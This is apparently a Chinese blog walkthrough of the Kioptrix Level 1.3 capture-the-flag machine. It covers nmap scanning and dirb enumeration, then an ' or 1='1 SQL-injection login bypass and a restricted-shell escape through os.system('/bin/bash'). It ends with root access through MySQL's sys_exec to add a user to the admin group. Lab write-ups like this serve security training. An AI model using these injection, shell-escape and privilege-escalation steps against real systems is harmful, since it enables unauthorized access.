CTF靶场之Kioptrix: Level 1.3

靶机下载

进入官网,搜索下载

点进入最后一个level-1.3

下载之后得到一个安装包,解压安装包

在VMware上重新创建一个空白虚拟机,将下载好的.vmdk 文件与空白虚拟机的vmdk文件交换,将下载好的vmdk文件进行重命名。
之后打开虚拟机。
攻击机:

kali
忍者渗透系统

渗透流程

查看自己ip地址:
ifconfig

隐蔽扫描

-sN是Null扫描,是通过发送非常规的TCP通信数据包对计算机进行探测;目标端口是开放的则不会响应任何信息
nmap -sn 192.168.85.0/24

完全的扫描
nmap -sV -A 192.168.85.128

dirb: 目录枚举

发现john
访问http://192.168.85.128/john

登录
万能密码原理:
加入有个sql语句select name,pass from tbAdmin where name='admin' and pass='123456'
那假如我们输入密码为' or 1='1
就会变成select name,pass from tbAdmin where name='admin' and pass='' or 1='1‘,这样的话永为真
在尝试Admin和' or 1='1时成功

ssh连接
ssh john@192.168.85.128

数据库提权

echo os.system("/bin/bash") #输出bash命令行
cd /var/www
cat checklogin.php

mysql -uroot -p
select sys_exec("usermod -aG admin john");
exit


查看flag

sudo su root 
密码:MyNameIsJohn
cd ~
cat congrats.txt

posted on 2022-09-14 19:25  寂寞梧桐#  阅读(197)  评论(0编辑  收藏  举报

导航